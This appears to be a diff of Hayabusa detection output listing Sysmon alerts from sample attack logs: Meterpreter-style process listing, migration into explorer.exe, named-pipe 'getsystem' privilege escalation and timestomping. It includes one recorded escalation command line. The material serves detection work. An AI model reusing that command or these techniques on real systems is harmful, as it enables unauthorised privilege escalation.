+2019-04-30 16:23:00.914 +09:00,IEWIN7,10,low,,Process Access,Src Process: D:\m.exe | Tgt Process: C:\Windows\system32\wbem\unsecapp.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1410 | Src PID: 3772 | Src PGUID: 365ABB72-F7C9-5CC7-0000-0010BF010E00 | Tgt PID: 1000 | Tgt PGUID: 365ABB72-F6A4-5CC7-0000-001098750100,../hayabusa-rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx
+2019-04-30 16:23:00.914 +09:00,IEWIN7,10,low,,Process Access,Src Process: D:\m.exe | Tgt Process: C:\Windows\system32\sppsvc.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1410 | Src PID: 3772 | Src PGUID: 365ABB72-F7C9-5CC7-0000-0010BF010E00 | Tgt PID: 1896 | Tgt PGUID: 365ABB72-F6A4-5CC7-0000-001020BA0100,../hayabusa-rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx
+2019-04-30 16:23:00.914 +09:00,IEWIN7,10,low,,Process Access,Src Process: D:\m.exe | Tgt Process: C:\Windows\System32\svchost.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1410 | Src PID: 3772 | Src PGUID: 365ABB72-F7C9-5CC7-0000-0010BF010E00 | Tgt PID: 2160 | Tgt PGUID: 365ABB72-F6A5-5CC7-0000-00100CD40100,../hayabusa-rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx
+2019-04-30 16:23:00.914 +09:00,IEWIN7,10,low,,Process Access,Src Process: D:\m.exe | Tgt Process: C:\Windows\system32\svchost.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1410 | Src PID: 3772 | Src PGUID: 365ABB72-F7C9-5CC7-0000-0010BF010E00 | Tgt PID: 2192 | Tgt PGUID: 365ABB72-F6A5-5CC7-0000-001094D70100,../hayabusa-rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx
+2019-04-30 16:23:00.914 +09:00,IEWIN7,10,low,,Process Access,Src Process: D:\m.exe | Tgt Process: C:\Windows\system32\wbem\wmiprvse.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1410 | Src PID: 3772 | Src PGUID: 365ABB72-F7C9-5CC7-0000-0010BF010E00 | Tgt PID: 2360 | Tgt PGUID: 365ABB72-F6A5-5CC7-0000-00108AFF0100,../hayabusa-rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx
+2019-04-30 16:23:00.914 +09:00,IEWIN7,10,low,,Process Access,Src Process: D:\m.exe | Tgt Process: C:\Program Files\Google\Update\1.3.34.7\GoogleCrashHandler.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1410 | Src PID: 3772 | Src PGUID: 365ABB72-F7C9-5CC7-0000-0010BF010E00 | Tgt PID: 2416 | Tgt PGUID: 365ABB72-F6A6-5CC7-0000-00103F140200,../hayabusa-rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx
+2019-04-30 16:23:00.914 +09:00,IEWIN7,10,low,,Process Access,Src Process: D:\m.exe | Tgt Process: C:\Windows\System32\rundll32.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1410 | Src PID: 3772 | Src PGUID: 365ABB72-F7C9-5CC7-0000-0010BF010E00 | Tgt PID: 2448 | Tgt PGUID: 365ABB72-F6A6-5CC7-0000-0010DC200200,../hayabusa-rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx
+2019-04-30 16:23:00.914 +09:00,IEWIN7,10,low,,Process Access,Src Process: D:\m.exe | Tgt Process: C:\Windows\system32\Dwm.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1410 | Src PID: 3772 | Src PGUID: 365ABB72-F7C9-5CC7-0000-0010BF010E00 | Tgt PID: 2788 | Tgt PGUID: 365ABB72-F6C9-5CC7-0000-0010A25C0600,../hayabusa-rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx
+2019-04-30 16:23:00.914 +09:00,IEWIN7,10,low,,Process Access,Src Process: D:\m.exe | Tgt Process: C:\Windows\Explorer.EXE | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1410 | Src PID: 3772 | Src PGUID: 365ABB72-F7C9-5CC7-0000-0010BF010E00 | Tgt PID: 2812 | Tgt PGUID: 365ABB72-F6C9-5CC7-0000-0010135F0600,../hayabusa-rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx
+2019-04-30 16:23:00.914 +09:00,IEWIN7,10,low,,Process Access,Src Process: D:\m.exe | Tgt Process: C:\Windows\System32\VBoxTray.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1410 | Src PID: 3772 | Src PGUID: 365ABB72-F7C9-5CC7-0000-0010BF010E00 | Tgt PID: 2908 | Tgt PGUID: 365ABB72-F6C9-5CC7-0000-00109B9A0600,../hayabusa-rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx
+2019-04-30 16:23:00.914 +09:00,IEWIN7,10,low,,Process Access,Src Process: D:\m.exe | Tgt Process: C:\Users\IEUser\AppData\Roaming\svchost.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1410 | Src PID: 3772 | Src PGUID: 365ABB72-F7C9-5CC7-0000-0010BF010E00 | Tgt PID: 3016 | Tgt PGUID: 365ABB72-F6CA-5CC7-0000-00104DBB0600,../hayabusa-rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx
+2019-04-30 16:23:00.914 +09:00,IEWIN7,10,medium,PrivEsc | Evas,Suspicious In-Memory Module Execution,,../hayabusa-rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx
+2019-04-30 16:23:00.914 +09:00,IEWIN7,10,medium,PrivEsc | Evas,Suspicious In-Memory Module Execution,,../hayabusa-rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx
+2019-04-30 16:23:00.914 +09:00,IEWIN7,10,medium,PrivEsc | Evas,Suspicious In-Memory Module Execution,,../hayabusa-rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx
+2019-04-30 16:23:00.914 +09:00,IEWIN7,10,medium,PrivEsc | Evas,Suspicious In-Memory Module Execution,,../hayabusa-rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx
+2019-04-30 16:23:00.914 +09:00,IEWIN7,10,medium,PrivEsc | Evas,Suspicious In-Memory Module Execution,,../hayabusa-rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx
+2019-04-30 16:23:00.914 +09:00,IEWIN7,10,medium,PrivEsc | Evas,Suspicious In-Memory Module Execution,,../hayabusa-rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx
+2019-04-30 16:23:00.914 +09:00,IEWIN7,10,medium,PrivEsc | Evas,Suspicious In-Memory Module Execution,,../hayabusa-rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx
+2019-04-30 16:23:00.914 +09:00,IEWIN7,10,medium,PrivEsc | Evas,Suspicious In-Memory Module Execution,,../hayabusa-rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx
+2019-04-30 16:23:00.914 +09:00,IEWIN7,10,medium,PrivEsc | Evas,Suspicious In-Memory Module Execution,,../hayabusa-rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx
+2019-04-30 16:23:00.914 +09:00,IEWIN7,10,medium,PrivEsc | Evas,Suspicious In-Memory Module Execution,,../hayabusa-rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx
+2019-04-30 16:23:00.914 +09:00,IEWIN7,10,medium,PrivEsc | Evas,Suspicious In-Memory Module Execution,,../hayabusa-rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx
+2019-04-30 16:23:00.914 +09:00,IEWIN7,10,medium,PrivEsc | Evas,Suspicious In-Memory Module Execution,,../hayabusa-rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx
+2019-04-30 16:23:00.914 +09:00,IEWIN7,10,medium,PrivEsc | Evas,Suspicious In-Memory Module Execution,,../hayabusa-rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx
+2019-04-30 16:23:00.914 +09:00,IEWIN7,10,medium,PrivEsc | Evas,Suspicious In-Memory Module Execution,,../hayabusa-rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx
+2019-04-30 16:23:00.914 +09:00,IEWIN7,10,medium,PrivEsc | Evas,Suspicious In-Memory Module Execution,,../hayabusa-rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx
+2019-04-30 16:23:00.914 +09:00,IEWIN7,10,medium,PrivEsc | Evas,Suspicious In-Memory Module Execution,,../hayabusa-rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx
+2019-04-30 16:23:00.914 +09:00,IEWIN7,10,medium,PrivEsc | Evas,Suspicious In-Memory Module Execution,,../hayabusa-rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx
+2019-04-30 16:23:00.914 +09:00,IEWIN7,10,medium,PrivEsc | Evas,Suspicious In-Memory Module Execution,,../hayabusa-rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx
+2019-04-30 16:23:00.914 +09:00,IEWIN7,10,medium,PrivEsc | Evas,Suspicious In-Memory Module Execution,,../hayabusa-rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx
+2019-04-30 16:23:00.914 +09:00,IEWIN7,10,medium,PrivEsc | Evas,Suspicious In-Memory Module Execution,,../hayabusa-rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx
+2019-04-30 16:23:00.914 +09:00,IEWIN7,10,medium,PrivEsc | Evas,Suspicious In-Memory Module Execution,,../hayabusa-rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx
+2019-04-30 16:23:00.914 +09:00,IEWIN7,10,medium,PrivEsc | Evas,Suspicious In-Memory Module Execution,,../hayabusa-rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx
+2019-04-30 16:23:00.914 +09:00,IEWIN7,10,medium,PrivEsc | Evas,Suspicious In-Memory Module Execution,,../hayabusa-rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx
+2019-04-30 16:23:00.930 +09:00,IEWIN7,10,low,,Process Access,Src Process: D:\m.exe | Tgt Process: C:\Windows\system32\cmd.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1410 | Src PID: 3772 | Src PGUID: 365ABB72-F7C9-5CC7-0000-0010BF010E00 | Tgt PID: 3028 | Tgt PGUID: 365ABB72-F6CA-5CC7-0000-001048C10600,../hayabusa-rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx
+2019-04-30 16:23:00.930 +09:00,IEWIN7,10,low,,Process Access,Src Process: D:\m.exe | Tgt Process: C:\Windows\system32\conhost.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1410 | Src PID: 3772 | Src PGUID: 365ABB72-F7C9-5CC7-0000-0010BF010E00 | Tgt PID: 3044 | Tgt PGUID: 365ABB72-F6CA-5CC7-0000-001017C50600,../hayabusa-rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx
+2019-04-30 16:23:00.930 +09:00,IEWIN7,10,low,,Process Access,Src Process: D:\m.exe | Tgt Process: C:\Windows\system32\SearchIndexer.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1410 | Src PID: 3772 | Src PGUID: 365ABB72-F7C9-5CC7-0000-0010BF010E00 | Tgt PID: 3264 | Tgt PGUID: 365ABB72-F6CF-5CC7-0000-00100C870700,../hayabusa-rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx
+2019-04-30 16:23:00.930 +09:00,IEWIN7,10,low,,Process Access,Src Process: D:\m.exe | Tgt Process: C:\Windows\system32\cmd.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1410 | Src PID: 3772 | Src PGUID: 365ABB72-F7C9-5CC7-0000-0010BF010E00 | Tgt PID: 2500 | Tgt PGUID: 365ABB72-F787-5CC7-0000-001068B30A00,../hayabusa-rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx
+2019-04-30 16:23:00.930 +09:00,IEWIN7,10,low,,Process Access,Src Process: D:\m.exe | Tgt Process: C:\Windows\system32\conhost.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1410 | Src PID: 3772 | Src PGUID: 365ABB72-F7C9-5CC7-0000-0010BF010E00 | Tgt PID: 2024 | Tgt PGUID: 365ABB72-F787-5CC7-0000-0010FBB30A00,../hayabusa-rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx
+2019-04-30 16:23:00.930 +09:00,IEWIN7,10,low,,Process Access,Src Process: D:\m.exe | Tgt Process: C:\Windows\system32\mmc.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1410 | Src PID: 3772 | Src PGUID: 365ABB72-F7C9-5CC7-0000-0010BF010E00 | Tgt PID: 2352 | Tgt PGUID: 365ABB72-F797-5CC7-0000-00105AF70A00,../hayabusa-rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx
+2019-04-30 16:23:00.930 +09:00,IEWIN7,10,low,,Process Access,Src Process: D:\m.exe | Tgt Process: C:\Windows\system32\taskeng.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1410 | Src PID: 3772 | Src PGUID: 365ABB72-F7C9-5CC7-0000-0010BF010E00 | Tgt PID: 1236 | Tgt PGUID: 365ABB72-F7D0-5CC7-0000-0010B31E0E00,../hayabusa-rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx
+2019-04-30 16:23:00.930 +09:00,IEWIN7,10,low,,Process Access,Src Process: D:\m.exe | Tgt Process: C:\Users\IEUser\AppData\Local\Programs\Opera\launcher.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1410 | Src PID: 3772 | Src PGUID: 365ABB72-F7C9-5CC7-0000-0010BF010E00 | Tgt PID: 3712 | Tgt PGUID: 365ABB72-F7D0-5CC7-0000-0010D0220E00,../hayabusa-rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx
+2019-04-30 16:23:00.930 +09:00,IEWIN7,10,low,,Process Access,Src Process: D:\m.exe | Tgt Process: C:\Users\IEUser\AppData\Local\Programs\Opera\60.0.3255.70\opera_autoupdate.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1410 | Src PID: 3772 | Src PGUID: 365ABB72-F7C9-5CC7-0000-0010BF010E00 | Tgt PID: 3624 | Tgt PGUID: 365ABB72-F7D0-5CC7-0000-0010DF2F0E00,../hayabusa-rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx
+2019-04-30 16:23:00.930 +09:00,IEWIN7,10,low,,Process Access,Src Process: D:\m.exe | Tgt Process: C:\Users\IEUser\AppData\Local\Programs\Opera\60.0.3255.70\opera_autoupdate.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1410 | Src PID: 3772 | Src PGUID: 365ABB72-F7C9-5CC7-0000-0010BF010E00 | Tgt PID: 3504 | Tgt PGUID: 365ABB72-F7D1-5CC7-0000-0010AF380E00,../hayabusa-rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx
+2019-04-30 16:23:00.930 +09:00,IEWIN7,10,low,,Process Access,Src Process: D:\m.exe | Tgt Process: C:\Windows\system32\wbem\wmiprvse.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1410 | Src PID: 3772 | Src PGUID: 365ABB72-F7C9-5CC7-0000-0010BF010E00 | Tgt PID: 2144 | Tgt PGUID: 365ABB72-F7D1-5CC7-0000-0010CE400E00,../hayabusa-rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx
+2019-04-30 16:23:00.930 +09:00,IEWIN7,10,low,,Process Access,Src Process: D:\m.exe | Tgt Process: C:\Windows\system32\DllHost.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1410 | Src PID: 3772 | Src PGUID: 365ABB72-F7C9-5CC7-0000-0010BF010E00 | Tgt PID: 1344 | Tgt PGUID: 365ABB72-F7D1-5CC7-0000-001058500E00,../hayabusa-rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx
+2019-04-30 16:23:00.930 +09:00,IEWIN7,10,medium,PrivEsc | Evas,Suspicious In-Memory Module Execution,,../hayabusa-rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx
+2019-04-30 16:23:00.930 +09:00,IEWIN7,10,medium,PrivEsc | Evas,Suspicious In-Memory Module Execution,,../hayabusa-rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx
+2019-04-30 16:23:00.930 +09:00,IEWIN7,10,medium,PrivEsc | Evas,Suspicious In-Memory Module Execution,,../hayabusa-rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx
+2019-04-30 16:23:00.930 +09:00,IEWIN7,10,medium,PrivEsc | Evas,Suspicious In-Memory Module Execution,,../hayabusa-rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx
+2019-04-30 16:23:00.930 +09:00,IEWIN7,10,medium,PrivEsc | Evas,Suspicious In-Memory Module Execution,,../hayabusa-rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx
+2019-04-30 16:23:00.930 +09:00,IEWIN7,10,medium,PrivEsc | Evas,Suspicious In-Memory Module Execution,,../hayabusa-rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx
+2019-04-30 16:23:00.930 +09:00,IEWIN7,10,medium,PrivEsc | Evas,Suspicious In-Memory Module Execution,,../hayabusa-rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx
+2019-04-30 16:23:00.930 +09:00,IEWIN7,10,medium,PrivEsc | Evas,Suspicious In-Memory Module Execution,,../hayabusa-rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx
+2019-04-30 16:23:00.930 +09:00,IEWIN7,10,medium,PrivEsc | Evas,Suspicious In-Memory Module Execution,,../hayabusa-rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx
+2019-04-30 16:23:00.930 +09:00,IEWIN7,10,medium,PrivEsc | Evas,Suspicious In-Memory Module Execution,,../hayabusa-rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx
+2019-04-30 16:23:00.930 +09:00,IEWIN7,10,medium,PrivEsc | Evas,Suspicious In-Memory Module Execution,,../hayabusa-rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx
+2019-04-30 16:23:00.930 +09:00,IEWIN7,10,medium,PrivEsc | Evas,Suspicious In-Memory Module Execution,,../hayabusa-rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx
+2019-04-30 16:26:34.133 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: \\vboxsrv\HTools\m.exe | Tgt Process: C:\Windows\explorer.exe | Src PID: 3772 | Src PGUID: 365ABB72-F7C9-5CC7-0000-0010BF010E00 | Tgt PID: 2812 | Tgt PGUID: 365ABB72-F6C9-5CC7-0000-0010135F0600,../hayabusa-rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/meterpreter_migrate_to_explorer_sysmon_8.evtx
+2019-04-30 16:46:15.215 +09:00,IEWIN7,1,info,,Process Created,Cmd: cmd.exe /c echo msdhch > \\.\pipe\msdhch | Process: C:\Windows\System32\cmd.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 4088 | PGUID: 365ABB72-FD47-5CC7-0000-00106AF61D00,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_13_1_meterpreter_getsystem_NamedPipeImpersonation.evtx
+2019-04-30 16:46:15.215 +09:00,IEWIN7,1,high,PrivEsc,Meterpreter or Cobalt Strike Getsystem Service Start,,../hayabusa-rules/sigma/process_creation/proc_creation_win_meterpreter_or_cobaltstrike_getsystem_service_start.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_13_1_meterpreter_getsystem_NamedPipeImpersonation.evtx
+2019-04-30 16:46:15.215 +09:00,IEWIN7,1,low,Disc,Redirect Output in CommandLine,,../hayabusa-rules/sigma/process_creation/proc_creation_win_cmd_redirect.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_13_1_meterpreter_getsystem_NamedPipeImpersonation.evtx
+2019-04-30 16:46:15.215 +09:00,IEWIN7,1,high,PrivEsc,Abused Debug Privilege by Arbitrary Parent Processes,,../hayabusa-rules/sigma/process_creation/proc_creation_win_abusing_debug_privilege.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_13_1_meterpreter_getsystem_NamedPipeImpersonation.evtx
+2019-04-30 19:12:45.583 +09:00,IEWIN7,11,info,,File Created,Path: C:\Users\IEUser\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\bs.ps1 | Process: C:\Windows\system32\cmd.exe | PID: 3292 | PGUID: 365ABB72-1EFA-5CC8-0000-0010D3DE1C00,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sysmon_2_11_evasion_timestomp_MACE.evtx
+2019-04-30 19:13:42.052 +09:00,IEWIN7,2,low,Evas,Possible Timestomping,Path: C:\Users\IEUser\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\bs.ps1 | Process: C:\Windows\Explorer.EXE | CreationUtcTime: 2016-02-02 15:30:02.000 | PreviousCreationUtcTime: 2019-04-30 10:12:45.583 | PID: %PID% | PGUID: 365ABB72-16CD-5CC8-0000-0010483A0600,../hayabusa-rules/hayabusa/sysmon/alerts/2_PossibleTimestomping.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sysmon_2_11_evasion_timestomp_MACE.evtx
